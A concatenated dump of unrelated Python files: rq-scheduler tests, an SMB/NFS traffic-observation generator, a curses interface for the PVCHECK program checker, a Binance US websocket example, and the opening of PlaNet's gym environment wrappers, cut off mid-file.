self.scheduler.schedule(datetime.utcnow(), say_hello, repeat=11)
self.assertRaises(ValueError, create_job)
def test_job_with_intervals_get_rescheduled(self):
"""
Ensure jobs with interval attribute are put back in the scheduler
"""
time_now = datetime.utcnow()
interval = 10
job = self.scheduler.schedule(time_now, say_hello, interval=interval)
self.scheduler.enqueue_job(job)
self.assertIn(job.id,
tl(self.testconn.zrange(self.scheduler.scheduled_jobs_key, 0, 1)))
self.assertEqual(self.testconn.zscore(self.scheduler.scheduled_jobs_key, job.id),
to_unix(time_now) + interval)
def test_job_with_interval_can_set_meta(self):
"""
Ensure that jobs with interval attribute can be created with meta
"""
time_now = datetime.utcnow()
interval = 10
meta = {'say': 'hello'}
job = self.scheduler.schedule(time_now, say_hello, interval=interval, meta=meta)
self.scheduler.enqueue_job(job)
self.assertEqual(job.meta, meta)
def test_job_with_crontab_get_rescheduled(self):
# Create a job with a cronjob_string
job = self.scheduler.cron("1 * * * *", say_hello)
# current unix_time
old_next_scheduled_time = self.testconn.zscore(self.scheduler.scheduled_jobs_key, job.id)
# change crontab
job.meta['cron_string'] = "2 * * * *"
# enqueue the job
self.scheduler.enqueue_job(job)
self.assertIn(job.id,
tl(self.testconn.zrange(self.scheduler.scheduled_jobs_key, 0, 1)))
# check that next scheduled time has changed
self.assertNotEqual(old_next_scheduled_time,
self.testconn.zscore(self.scheduler.scheduled_jobs_key, job.id))
# check that new next scheduled time is set correctly
expected_next_scheduled_time = to_unix(get_next_scheduled_time("2 * * * *"))
self.assertEqual(self.testconn.zscore(self.scheduler.scheduled_jobs_key, job.id),
expected_next_scheduled_time)
def test_job_with_repeat(self):
"""
Ensure jobs with repeat attribute are put back in the scheduler
X (repeat) number of times
"""
time_now = datetime.utcnow()
interval = 10
# If job is repeated once, the job shouldn't be put back in the queue
job = self.scheduler.schedule(time_now, say_hello, interval=interval, repeat=1)
self.scheduler.enqueue_job(job)
self.assertNotIn(job.id,
tl(self.testconn.zrange(self.scheduler.scheduled_jobs_key, 0, 1)))
# If job is repeated twice, it should only be put back in the queue once
job = self.scheduler.schedule(time_now, say_hello, interval=interval, repeat=2)
self.scheduler.enqueue_job(job)
self.assertIn(job.id,
tl(self.testconn.zrange(self.scheduler.scheduled_jobs_key, 0, 1)))
self.scheduler.enqueue_job(job)
self.assertNotIn(job.id,
tl(self.testconn.zrange(self.scheduler.scheduled_jobs_key, 0, 1)))
def test_missing_jobs_removed_from_scheduler(self):
"""
Ensure jobs that don't exist when queued are removed from the scheduler.
"""
job = self.scheduler.schedule(datetime.utcnow(), say_hello)
job.cancel()
list(self.scheduler.get_jobs_to_queue())
self.assertIn(job.id, tl(self.testconn.zrange(
self.scheduler.scheduled_jobs_key, 0, 1)))
job.delete()
list(self.scheduler.get_jobs_to_queue())
self.assertNotIn(job.id, tl(self.testconn.zrange(
self.scheduler.scheduled_jobs_key, 0, 1)))
def test_periodic_jobs_sets_result_ttl(self):
"""
Ensure periodic jobs set result_ttl to infinite.
"""
job = self.scheduler.schedule(datetime.utcnow(), say_hello, interval=5)
job_from_queue = Job.fetch(job.id, connection=self.testconn)
self.assertEqual(job.result_ttl, -1)
def test_periodic_jobs_sets_ttl(self):
"""
        Ensure periodic jobs set ttl correctly.
"""
job = self.scheduler.schedule(datetime.utcnow(), say_hello, interval=5, ttl=4)
job_from_queue = Job.fetch(job.id, connection=self.testconn)
self.assertEqual(job.ttl, 4)
def test_periodic_jobs_sets_meta(self):
"""
        Ensure periodic jobs set meta correctly.
"""
meta = {'say': 'hello'}
job = self.scheduler.schedule(datetime.utcnow(), say_hello, interval=5, meta=meta)
self.assertEqual(meta, job.meta)
def test_periodic_job_sets_id(self):
"""
Ensure that ID is passed to RQ by schedule.
"""
job = self.scheduler.schedule(datetime.utcnow(), say_hello, interval=5, id='id test')
job_from_queue = Job.fetch(job.id, connection=self.testconn)
self.assertEqual('id test', job.id)
def test_periodic_job_sets_description(self):
"""
Ensure that description is passed to RQ by schedule.
"""
job = self.scheduler.schedule(datetime.utcnow(), say_hello, interval=5, description='description')
job_from_queue = Job.fetch(job.id, connection=self.testconn)
self.assertEqual('description', job.description)
def test_run(self):
"""
Check correct signal handling in Scheduler.run().
"""
def send_stop_signal():
"""
            Sleep for 1 second, then send an INT signal to ourselves, so the
signal handler installed by scheduler.run() is called.
"""
time.sleep(1)
os.kill(os.getpid(), signal.SIGINT)
thread = Thread(target=send_stop_signal)
thread.start()
self.assertRaises(SystemExit, self.scheduler.run)
thread.join()
def test_run_burst(self):
"""
Check burst mode of Scheduler.run().
"""
now = datetime.utcnow()
job = self.scheduler.enqueue_at(now, say_hello)
self.assertIn(job, self.scheduler.get_jobs_to_queue())
self.assertEqual(len(list(self.scheduler.get_jobs())), 1)
self.scheduler.run(burst=True)
self.assertEqual(len(list(self.scheduler.get_jobs())), 0)
def test_scheduler_w_o_explicit_connection(self):
"""
Ensure instantiating Scheduler w/o explicit connection works.
"""
s = Scheduler()
self.assertEqual(s.connection, self.testconn)
def test_small_float_interval(self):
"""
Test that scheduler accepts 'interval' of type float, less than 1 second.
"""
key = Scheduler.scheduler_key
lock_key = '%s_lock' % Scheduler.scheduler_key
self.assertNotIn(key, tl(self.testconn.keys('*')))
scheduler = Scheduler(connection=self.testconn, interval=0.1) # testing interval = 0.1 second
self.assertEqual(scheduler._interval, 0.1)
#acquire lock
self.assertTrue(scheduler.acquire_lock())
self.assertIn(lock_key, tl(self.testconn.keys('*')))
self.assertEqual(self.testconn.ttl(lock_key), 10) # int(0.1) + 10 = 10
#enqueue a job
now = datetime.utcnow()
job = scheduler.enqueue_at(now, say_hello)
self.assertIn(job, self.scheduler.get_jobs_to_queue())
self.assertEqual(len(list(self.scheduler.get_jobs())), 1)
#remove the lock
scheduler.remove_lock()
#test that run works with the small floating-point interval
def send_stop_signal():
"""
            Sleep for 1 second, then send an INT signal to ourselves, so the
signal handler installed by scheduler.run() is called.
"""
time.sleep(1)
os.kill(os.getpid(), signal.SIGINT)
thread = Thread(target=send_stop_signal)
thread.start()
self.assertRaises(SystemExit, scheduler.run)
thread.join()
#all jobs must have been scheduled during 1 second
self.assertEqual(len(list(scheduler.get_jobs())), 0)
def test_get_queue_for_job_with_job_queue_name(self):
"""
Tests that scheduler gets the correct queue for the job when
queue_name is provided.
"""
queue = Queue('scheduler_foo', connection=self.testconn)
job_queue = Queue('job_foo', connection=self.testconn)
scheduler = Scheduler(connection=self.testconn, queue=queue)
job = scheduler._create_job(say_hello, queue_name='job_foo')
self.assertEqual(scheduler.get_queue_for_job(job), job_queue)
def test_get_queue_for_job_without_job_queue_name(self):
"""
Tests that scheduler gets the scheduler queue for the job
when queue name is not provided for that job.
"""
queue = Queue('scheduler_foo', connection=self.testconn)
scheduler = Scheduler(connection=self.testconn, queue=queue)
job = scheduler._create_job(say_hello)
self.assertEqual(scheduler.get_queue_for_job(job), queue)
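# Hedged usage sketch (not part of the test suite): the rq-scheduler calls exercised above,
# as they might appear in application code. The Redis connection and queue name are
# assumptions, so the snippet is left commented out.
#
# from redis import Redis
# from rq_scheduler import Scheduler
#
# scheduler = Scheduler(connection=Redis(), queue_name='default', interval=5)
# scheduler.enqueue_in(timedelta(minutes=1), say_hello, 'World')            # one-off, relative
# scheduler.enqueue_at(datetime.utcnow(), simple_addition, 1, 2, 3)         # one-off, absolute
# scheduler.schedule(datetime.utcnow(), say_hello, interval=60, repeat=10)  # periodic
# scheduler.cron('1 * * * *', say_hello)                                    # crontab-style
# scheduler.run()  # or scheduler.run(burst=True) to move due jobs once and exit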
|
main_app_host.py
|
#!/usr/bin/env python3
from traffic_generator_host import TrafficGeneratorHost
from load_files_helper import LoadFilesHelper
import multiprocessing
import argparse
import os
import shutil
# The interval duration can be changed,
# but note that the study was carried out with 5-minute intervals
parser = argparse.ArgumentParser(description='Launches the observation generator (samples of read/write operations '
                                             'for the clients) of SMB/NFS traffic')
parser.add_argument("-tt", "--total_time", default=8, type=int, help="Total execution time, in hours, default: 8")
parser.add_argument("-it", "--interval_time", default=5, type=int, help="Interval time, in minutes, default: 5")
## the type argument already encodes how many users of each type to create
parser.add_argument("-tc", "--type_clients", default="1,0,0", type=str, help="Type of clients, default: 1,0,0; "
"e.g: 1,2,0 -> this means 1 of type 0, "
"2 of type 1 ,etc. or 9 only -> 9 type 0 ")
args = parser.parse_args()
interval_duration = args.interval_time
total_time = args.total_time
tipos_usuario = args.type_clients
# Load the program's files
load_files_helper = LoadFilesHelper()
# Builds the array with all the user types that need to be instantiated, e.g. [1 1 2 0] -> 2 of type 1, 1 of type 2 and 1
# of type 0
def process_tipos_usario_arg(param):
param_split = param.split(',')
arr = []
indice_user = 0
for item in param_split:
if int(item) > 0:
arr += [indice_user] * int(item)
indice_user += 1
return arr
def create_generator(id_cliente, tipo_usuario):
generador = TrafficGeneratorHost(load_files_helper, id_cliente, tipo_usuario, total_time * 3600,
interval_duration * 60)
generador.start()
## TODO: review whether this function is useful, since I think the folder is deleted with bash, although it helps for debugging
def delete_observaciones_folder():
folder = os.path.join(os.getcwd(), "observaciones")
for filename in os.listdir(folder):
file_path = os.path.join(folder, filename)
try:
if os.path.isfile(file_path) or os.path.islink(file_path):
os.unlink(file_path)
elif os.path.isdir(file_path):
shutil.rmtree(file_path)
except Exception as e:
print('Failed to delete %s. Reason: %s' % (file_path, e))
def start():
delete_observaciones_folder()
arr_usuarios = process_tipos_usario_arg(tipos_usuario)
    ## TODO: this for loop should be replaced by an array, which would be a list with all the user types
    ## This i is used to control the reproducibility of the traces
i = 0
for item in arr_usuarios:
        # TODO: multiprocessing could be used to generate the observations in less time,
        # but it must be decided how to configure the seeds, since random uses the system
        # time as its seed and would create identical observations for every client
        # multiprocessing.Process(target=create_generator, args=(i,)).start()
        print('Creating observation files for cliente_' + str(i))
create_generator(i, item)
i += 1
start()
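# Hedged usage note (illustrative): with the arguments defined above, a run such as
#     ./main_app_host.py -tt 8 -it 5 -tc 1,2,0
# makes process_tipos_usario_arg("1,2,0") return [0, 1, 1], i.e. one client of type 0 and
# two clients of type 1, each generating observations for 8 hours in 5-minute intervals;
# the "observaciones" folder is cleared before generation starts.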
|
interactiveformatter.py
|
# -*- coding: utf-8 -*-
"""Interactive interface."""
import curses
import threading
import formatter
import executor
import functools
import i18n
_ = i18n.translate
# TODO: i18n
# TODO: refactoring with Formatter + separate UI class
HELP_MESSAGE = """
PVCHECK automatic verification of computer programs
===================================================
Keyboard controls:
RIGHT switch to the next test in the suite
LEFT switch to the previous test in the suite
DOWN, n scroll one line down
UP, p scroll one line up
PgDN scroll one page down
PgUP scroll one page up
HOME scroll to the beginning
END scroll to the end
r redraw the screen
q, ESC close the program
s show a summary of the results
i show info about the test case
o show the program's output
h, ? show this page
"""
HELP_MESSAGE_IT = """
PVCHECK verifica automatica di programmi
===================================================
Controlli tramite tastiera
DESTRA passa al test successivo nella suite
SINISTRA passa al test precedente nella suite
GIU`, n scorre una riga in giu`
SU, p scorre una riga in su
PgDN scorre una pagina in giu`
PgUP scorre una pagina in su
HOME scorre all'inizio
END scorre alla fine
r ridisegna lo schermo
q, ESC chiude il programma
s mostra un riepilogo dei risultati
i mostra informazioni sul caso di test
o mostra l'output del programma
h, ? mostra questa pagina
"""
i18n.register_translation(HELP_MESSAGE, "it", HELP_MESSAGE_IT)
_CALLBACKS = {}
def _register_key(*keys):
"""Decorator registering key->callback pairs.
Keys can be strings or character codes."""
def decorator(f):
for k in keys:
if isinstance(k, str):
k = ord(k)
_CALLBACKS[k] = f
return f
return decorator
def _synchronized(f):
"""Makes the calls to the method acquire a lock owned by the class instance."""
@functools.wraps(f)
def decorated(self, *args, **kwargs):
with self._mutex:
return f(self, *args, **kwargs)
return decorated
class InteractiveFormatter(formatter.Formatter):
"""Formatter that uses curses to report the result."""
FOOTER_H = 2 # height of the footer
MAX_W = 512 # max line length
COLOR_OK = 1
COLOR_WARN = 2
COLOR_ERR = 3
_RESULT_TABLE = {
executor.ER_OK: None,
executor.ER_TIMEOUT: _("TIMEOUT EXPIRED: PROCESS TERMINATED"),
executor.ER_OUTPUT_LIMIT: _("TOO MANY OUTPUT LINES"),
executor.ER_SEGFAULT: _("PROCESS ENDED WITH A FAILURE (SEGMENTATION FAULT)"),
        executor.ER_ERROR: _("PROCESS ENDED WITH A FAILURE (ERROR CODE {status})"),
        executor.ER_NOTFILE: _("FAILED TO RUN THE FILE '{progname}' (the file does not exist)")
}
def __init__(self):
"""Create the interactive formatter."""
self._reports = []
self._report_index = 0
self._screen = None
self._mutex = threading.Lock()
self._initialization_barrier = None
self._sections = []
self._err_counts = {}
self._warn_counts = {}
self._ok_counts = {}
        self._err_count = 0
self._warn_count = 0
self._ok_count = 0
@_register_key("q", "Q", 27) # 27 -> ESC
def _quit(self):
self._stop = True
@_register_key("p", "P", curses.KEY_UP)
def scroll_line_up(self):
self._reports[self._report_index].scroll(self._text_height(), -1)
self._update()
@_register_key("n", "N", curses.KEY_DOWN, 10) # 10 -> ENTER
def scroll_line_down(self):
self._reports[self._report_index].scroll(self._text_height(), 1)
self._update()
@_register_key(curses.KEY_PPAGE)
def scroll_page_up(self):
self._reports[self._report_index].scroll(self._text_height(), pages=-1)
self._update()
@_register_key(curses.KEY_NPAGE)
def scroll_page_down(self):
self._reports[self._report_index].scroll(self._text_height(), pages=1)
self._update()
@_register_key(curses.KEY_HOME)
def scroll_begin(self):
self._reports[self._report_index].scroll(self._text_height(), documents=-1)
self._update()
@_register_key(curses.KEY_END)
def scroll_end(self):
self._reports[self._report_index].scroll(self._text_height(), documents=1)
self._update()
@_register_key("r", "R", curses.KEY_RESIZE)
def resize_terminal(self):
self._update()
@_register_key(curses.KEY_LEFT)
def previous_report(self):
self._screen.clear()
if len(self._reports) > 1:
self._report_index = max(self._report_index - 1, 1)
self._update()
@_register_key(curses.KEY_RIGHT)
def next_report(self):
self._screen.clear()
self._report_index = min(self._report_index + 1, len(self._reports) - 1)
self._update()
@_register_key("h", "H", "?")
    def show_help(self):
self._screen.clear()
self._show_info(_(HELP_MESSAGE))
self._screen.clear()
self._update()
@_register_key("i", "I")
    def show_test_info(self):
self._screen.clear()
doc = self._reports[self._report_index]
self._show_info(doc.info())
self._screen.clear()
self._update()
@_register_key("o", "O")
    def show_program_output(self):
self._screen.clear()
doc = self._reports[self._report_index]
text = _("PROGRAM'S OUTPUT:")
self._show_info(text + "\n" + doc.output)
self._screen.clear()
self._update()
@_register_key("s", "S")
    def show_summary(self):
self._screen.clear()
doc = self._reports[self._report_index]
text = [_("SUMMARY:"), ""]
for s in self._sections:
line = "%20s %3d ok %3d warnings %3d errors" % (s, self._ok_counts[s], self._warn_counts[s], self._err_counts[s])
text.append(line)
text.append(" ")
self._show_info("\n".join(text))
self._screen.clear()
self._update()
def _thread_body(self):
"""UI thread."""
curses.wrapper(self._main_loop)
def _main_loop(self, screen):
"""Main loop managing the interaction with the user."""
# First setup curses
self._screen = screen
curses.use_default_colors()
curses.init_pair(self.COLOR_OK, curses.COLOR_GREEN, -1)
curses.init_pair(self.COLOR_WARN, curses.COLOR_YELLOW, -1)
curses.init_pair(self.COLOR_ERR, curses.COLOR_RED, -1)
self._footer = curses.newwin(self.FOOTER_H, self._text_width(), self._text_height(), 0)
self._footer.bkgd(" ", curses.A_REVERSE)
self._reports.append(Report("PVCHECK", self.MAX_W))
self._reports[-1].add_line("Waiting for test results...")
self._report_index = 0
self._update()
self._stop = False
# This reactivate the main thread
self._initialization_barrier.wait()
# Event loop
while not self._stop:
ch = screen.getch()
with self._mutex:
_CALLBACKS.get(ch, lambda self: None)(self)
def _text_height(self):
"""Number of text lines displayed."""
return self._screen.getmaxyx()[0] - self.FOOTER_H
def _text_width(self):
"""Width of the displayed text."""
return min(self._screen.getmaxyx()[1], self.MAX_W)
def _add_footer(self, line, align, text, *extra):
"""Add some text in the footer."""
k = self._text_width() - 1 - len(text)
        pos = max(0, (0 if align == "left" else (k if align == "right" else k // 2)))
self._footer.addnstr(line, pos, text, self._text_width() - 1 - pos, *extra)
def _add_short_report(self):
"""Insert ok, warnings, errors counters in the footer."""
texts = [
"%3d " % self._ok_count, " %s, " % _("passes"),
"%3d " % self._warn_count, " %s, " % _("warnings"),
"%3d " % self._err_count, " %s" % _("errors")
]
styles = [
[curses.color_pair(self.COLOR_OK)], [],
[curses.color_pair(self.COLOR_WARN)], [],
[curses.color_pair(self.COLOR_ERR)], []
]
n = self._text_width() - 1
pos = 0
for t, s in zip (texts, styles):
self._footer.addnstr(1, pos, t, n, *s)
pos += len(t)
n -= len(t)
def _update(self):
"""Redraw everything."""
if self._screen is None:
return
self._screen.refresh()
height = self._text_height()
width = self._text_width()
doc = self._reports[self._report_index]
self._footer.mvwin(height, 0)
doc.refresh(self._text_height(), self._text_width())
self._footer.clear()
self._add_footer(0, "center", _("[Press 'h' for help]"), curses.A_DIM)
text = _("Test case %d of %d (%s)") % (self._report_index, len(self._reports) - 1, doc.title) + " "
self._add_footer(0, "left", text)
text = _("Lines %d-%d/%d") % (doc.top(), doc.bottom(height), doc.length())
self._add_footer(0, "right", text)
self._add_short_report()
if self._running:
tot = self._err_count + self._warn_count + self._ok_count
text = _("TEST RUNNING") + "..." + "|/-\\"[tot % 4]
else:
text = _("TEST COMPLETED")
self._add_footer(1, "right", text, curses.A_BOLD)
self._footer.refresh()
def _show_info(self, text):
"""Show some text on the screen temporarily disabling the main interface."""
self._screen.refresh()
lines = text.splitlines()
content_pad = curses.newpad(len(lines), 1 + max(map(len, lines)))
for n, line in enumerate(lines):
content_pad.addstr(n, 0, line)
start_line = 0
while True:
height, width = self._screen.getmaxyx()
start_line = max(0, start_line)
start_line = min(len(lines) - height, start_line)
content_pad.refresh(start_line, 0, 0, 0, height - 1, width - 1)
ch = self._screen.getch()
if ch in (curses.KEY_DOWN, ord("n"), ord("N")):
start_line += 1
elif ch in (curses.KEY_UP, ord("p"), ord("P")):
start_line -= 1
elif ch == curses.KEY_NPAGE:
start_line += height
elif ch == curses.KEY_PPAGE:
start_line -= height
elif ch == curses.KEY_END:
start_line += len(lines)
elif ch == curses.KEY_HOME:
start_line = 0
else:
break
# -- Formatter interface --------------------------------------------------
def begin_session(self):
self._err_count = self._warn_count = self._ok_count = 0
self._running = True
# Start the UI thread
self._initialization_barrier = threading.Barrier(2)
self._thread = threading.Thread(target=self._thread_body)
self._thread.start()
self._initialization_barrier.wait()
def end_session(self):
# Wait the termination of the UI thread
with self._mutex:
self._running = False
self._update()
self._thread.join()
@_synchronized
def begin_test(self, description, cmdline_args, input, tempfile):
description = description or ""
self._reports.append(Report(description, self.MAX_W, cmdline_args, input, tempfile))
if self._report_index == 0:
self._report_index = 1
self._update()
@_synchronized
def end_test(self):
pass
@_synchronized
def execution_result(self, cmdline_args, execution_result, test):
info = {
'progname': cmdline_args[0],
'status': execution_result.status
}
message = self._RESULT_TABLE[execution_result.result]
if execution_result.result != executor.ER_OK:
self._err_count += 1
message = message.format(**info)
for line in message.splitlines():
self._reports[-1].add_line(line, curses.color_pair(self.COLOR_ERR))
self._reports[-1].output = execution_result.output
self._update()
def _new_section(self, section_name):
if section_name not in self._sections:
self._sections.append(section_name)
self._err_counts[section_name] = 0
self._warn_counts[section_name] = 0
self._ok_counts[section_name] = 0
@_synchronized
def comparison_result(self, expected, got, diffs, matches):
add = self._reports[-1].add_line
all_ok = (max(diffs, default=0) <= 0)
self._new_section(expected.tag)
if all_ok:
self._ok_count += 1
self._ok_counts[expected.tag] += 1
else:
self._err_count += 1
self._err_counts[expected.tag] += 1
color = curses.color_pair(self.COLOR_OK if all_ok else self.COLOR_ERR)
add("[%s]" % expected.tag, color | curses.A_BOLD)
err_diff = "%s\t\t(" +_("expected") + " '%s')"
err_un = "%s\t\t(" + _("this line was not expected") + ")"
err_mis = "\t\t(" + _("missing line") + " '%s'"
for (i, d) in enumerate(diffs):
try:
out_string = formatter.handle_non_printable_chars(got.content[i])
except IndexError:
out_string = ''
if d <= 0:
# Correct
add(out_string, curses.color_pair(self.COLOR_OK))
elif matches[i] is None:
# Extra line
add(err_un % out_string, curses.color_pair(self.COLOR_ERR))
elif i >= len(got.content):
# Missing line
add(err_mis % matches[i], curses.color_pair(self.COLOR_ERR))
else:
# Mismatching lines
add(err_diff % (out_string, matches[i]), curses.color_pair(self.COLOR_ERR))
add("")
self._update()
@_synchronized
def missing_section(self, expected):
self._new_section(expected.tag)
self._warn_count += 1
self._warn_counts[expected.tag] += 1
message = ("\t\t(" + _("section [%s] is missing") + ")") % expected.tag
self._reports[-1].add_line(message, curses.color_pair(self.COLOR_WARN))
self._reports[-1].add_line("")
self._update()
class Report:
"""Test result displayed on the screen."""
def __init__(self, title, max_width, cmdline_args="", input="", tempfile=""):
"""Create a new report with the given title.
Lines are truncated to max_width.
"""
self.title = title
self._length = 0
self._max_width = max_width
self._pad = curses.newpad(1, max_width)
self._position = 0
self._cmdline_args = cmdline_args
self._input = input
self._tempfile = tempfile
self.output = ""
def add_line(self, line, *extra):
"""Add a line at the bottom of the document."""
self._pad.resize(self._length + 1, self._max_width)
self._pad.addnstr(self._length, 0, line, self._max_width, *extra)
self._length += 1
def scroll(self, page_height, lines=0, pages=0, documents=0):
"""Scroll up or down."""
amount = lines + page_height * pages + documents * self._length
self._position = max(0, min(self._position + amount, self._length - page_height))
def refresh(self, page_height, page_width):
"""Redraw the document on the screen."""
self._pad.refresh(self._position, 0, 0, 0, page_height - 1, page_width - 1)
def top(self):
"""Index of the first line on the screen (starting from 1)."""
return self._position + 1
def bottom(self, page_height):
"""Index of the last line on the screen."""
return min(self._position + page_height, self._length)
def length(self):
"""Number of lines in the document."""
return self._length
def info(self):
lines = [_("Test title: %s") % self.title]
# , "", _("Command line: %s") % " ".join(self._cmdline_args)]
if self._cmdline_args:
lines.append("")
args = [_("TEMP_FILE") if x is executor.ARG_TMPFILE else x for x in self._cmdline_args]
lines.append(_("Command line: %s") % " ".join(args))
if self._input and self._input.strip():
lines.extend(["", _("Input:")])
lines.extend(self._input.splitlines())
if self._tempfile:
lines.extend(["", _("Temporary file:")])
lines.extend(self._tempfile.splitlines())
return "\n".join(lines)
|
example_binance_us.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
# File: example_binance_us.py
#
# Part of ‘UNICORN Binance WebSocket API’
# Project website: https://github.com/oliver-zehentleitner/unicorn-binance-websocket-api
# Documentation: https://oliver-zehentleitner.github.io/unicorn-binance-websocket-api
# PyPI: https://pypi.org/project/unicorn-binance-websocket-api/
#
# Author: Oliver Zehentleitner
# https://about.me/oliver-zehentleitner
#
# Copyright (c) 2019, Oliver Zehentleitner
# All rights reserved.
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish, dis-
# tribute, sublicense, and/or sell copies of the Software, and to permit
# persons to whom the Software is furnished to do so, subject to the fol-
# lowing conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABIL-
# ITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT
# SHALL THE AUTHOR BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
from unicorn_binance_websocket_api.unicorn_binance_websocket_api_manager import BinanceWebSocketApiManager
import logging
import time
import threading
import os
def print_stream_data_from_stream_buffer(binance_websocket_api_manager):
while True:
if binance_websocket_api_manager.is_manager_stopping():
exit(0)
        oldest_stream_data_from_stream_buffer = binance_websocket_api_manager.pop_stream_data_from_stream_buffer()
        if oldest_stream_data_from_stream_buffer is False:
            time.sleep(0.01)
        else:
            print(oldest_stream_data_from_stream_buffer)
# https://docs.python.org/3/library/logging.html#logging-levels
logging.basicConfig(filename=os.path.basename(__file__) + '.log',
format="{asctime} [{levelname:8}] {process} {thread} {module}: {message}",
style="{")
logging.getLogger('unicorn-log').addHandler(logging.StreamHandler())
logging.getLogger('unicorn-log').setLevel(logging.INFO)
# create instance of BinanceWebSocketApiManager for Binance US
binance_websocket_api_manager = BinanceWebSocketApiManager(exchange="binance.us")
print("starting monitoring api!")
binance_websocket_api_manager.start_monitoring_api()
# set api key and secret for userData stream
binance_us_api_key = ""
binance_us_api_secret = ""
binance_websocket_api_manager.set_private_api_config(binance_us_api_key, binance_us_api_secret)
userdata_stream_id = binance_websocket_api_manager.create_stream(["arr"], ["!userData"])
ticker_all_stream_id = binance_websocket_api_manager.create_stream(["arr"], ["!ticker"])
miniticker_stream_id = binance_websocket_api_manager.create_stream(["arr"], ["!miniTicker"])
markets = {'btcusd', 'btcxrp', 'ethusd', 'bnbusd', 'busdusd'}
binance_websocket_api_manager.create_stream(["aggTrade"], markets)
binance_websocket_api_manager.create_stream(["trade"], markets)
binance_websocket_api_manager.create_stream(["kline_1m"], markets)
binance_websocket_api_manager.create_stream(["kline_5m"], markets)
binance_websocket_api_manager.create_stream(["kline_15m"], markets)
binance_websocket_api_manager.create_stream(["kline_1h"], markets)
binance_websocket_api_manager.create_stream(["kline_12h"], markets)
binance_websocket_api_manager.create_stream(["kline_1w"], markets)
binance_websocket_api_manager.create_stream(["ticker"], markets)
binance_websocket_api_manager.create_stream(["miniTicker"], markets)
binance_websocket_api_manager.create_stream(["depth"], markets)
binance_websocket_api_manager.create_stream(["depth5"], markets)
binance_websocket_api_manager.create_stream(["depth10"], markets)
binance_websocket_api_manager.create_stream(["depth20"], markets)
binance_websocket_api_manager.create_stream(["aggTrade"], markets)
channels = {'trade', 'kline_1m', 'kline_5m', 'kline_15m', 'kline_30m', 'kline_1h', 'kline_12h', 'kline_1w',
'miniTicker', 'depth20'}
binance_websocket_api_manager.create_stream(channels, markets)
# start a worker process to move the received stream_data from the stream_buffer to a print function
worker_thread = threading.Thread(target=print_stream_data_from_stream_buffer, args=(binance_websocket_api_manager,))
worker_thread.start()
# show an overview
while True:
binance_websocket_api_manager.print_summary()
time.sleep(1)
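# Hedged note, not part of the original example: the loop above never returns.
# To shut everything down cleanly one would break out of it and stop the
# manager (assuming the stop method name documented by the project), e.g.:
#
#     binance_websocket_api_manager.stop_manager_with_all_streams()
#     worker_thread.join()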
|
wrappers.py
|
# Copyright 2019 The PlaNet Authors. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Environment wrappers."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import atexit
import datetime
import io
import multiprocessing
import os
import sys
import traceback
import uuid
import gym
import gym.spaces
import numpy as np
import skimage.transform
import tensorflow as tf
from planet.tools import nested
class ObservationDict(object):
def __init__(self, env, key='observ'):
self._env = env
self._key = key
def __getattr__(self, name):
return getattr(self._env, name)
@property
def observation_space(self):
spaces = {self._key: self._env.observation_space}
return gym.spaces.Dict(spaces)
@property
def action_space(self):
return self._env.action_space
def step(self, action):
obs, reward, done, info = self._env.step(action)
obs = {self._key: obs}
return obs, reward, done, info
def reset(self):
obs = self._env.reset()
obs = {self._key: obs}
return obs
class ConcatObservation(object):
"""Select observations from a dict space and concatenate them."""
def __init__(self, env, keys):
self._env = env
self._keys = keys
def __getattr__(self, name):
return getattr(self._env, name)
@property
def observation_space(self):
spaces = self._env.observation_space.spaces
spaces = [spaces[key] for key in self._keys]
low = np.concatenate([space.low for space in spaces], 0)
high = np.concatenate([space.high for space in spaces], 0)
dtypes = [space.dtype for space in spaces]
if not all(dtype == dtypes[0] for dtype in dtypes):
message = 'Spaces must have the same data type; are {}.'
raise KeyError(message.format(', '.join(str(x) for x in dtypes)))
return gym.spaces.Box(low, high, dtype=dtypes[0])
def step(self, action):
obs, reward, done, info = self._env.step(action)
obs = self._select_keys(obs)
return obs, reward, done, info
def reset(self):
obs = self._env.reset()
obs = self._select_keys(obs)
return obs
def _select_keys(self, obs):
return np.concatenate([obs[key] for key in self._keys], 0)
class SelectObservations(object):
def __init__(self, env, keys):
self._env = env
self._keys = keys
@property
def observation_space(self):
spaces = self._env.observation_space.spaces
return gym.spaces.Dict({key: spaces[key] for key in self._keys})
@property
def action_space(self):
return self._env.action_space
def step(self, action, *args, **kwargs):
obs, reward, done, info = self._env.step(action, *args, **kwargs)
obs = {key: obs[key] for key in self._keys}
return obs, reward, done, info
def reset(self, *args, **kwargs):
obs = self._env.reset(*args, **kwargs)
obs = {key: obs[key] for key in self._keys}
return obs
class PixelObservations(object):
def __init__(self, env, size=(64, 64), dtype=np.uint8, key='image'):
assert isinstance(env.observation_space, gym.spaces.Dict)
self._env = env
self._size = size
self._dtype = dtype
self._key = key
def __getattr__(self, name):
return getattr(self._env, name)
@property
def observation_space(self):
high = {np.uint8: 255, np.float: 1.0}[self._dtype]
image = gym.spaces.Box(0, high, self._size + (3,), dtype=self._dtype)
spaces = self._env.observation_space.spaces.copy()
assert self._key not in spaces
spaces[self._key] = image
return gym.spaces.Dict(spaces)
@property
def action_space(self):
return self._env.action_space
def step(self, action):
obs, reward, done, info = self._env.step(action)
obs[self._key] = self._render_image()
return obs, reward, done, info
def reset(self):
obs = self._env.reset()
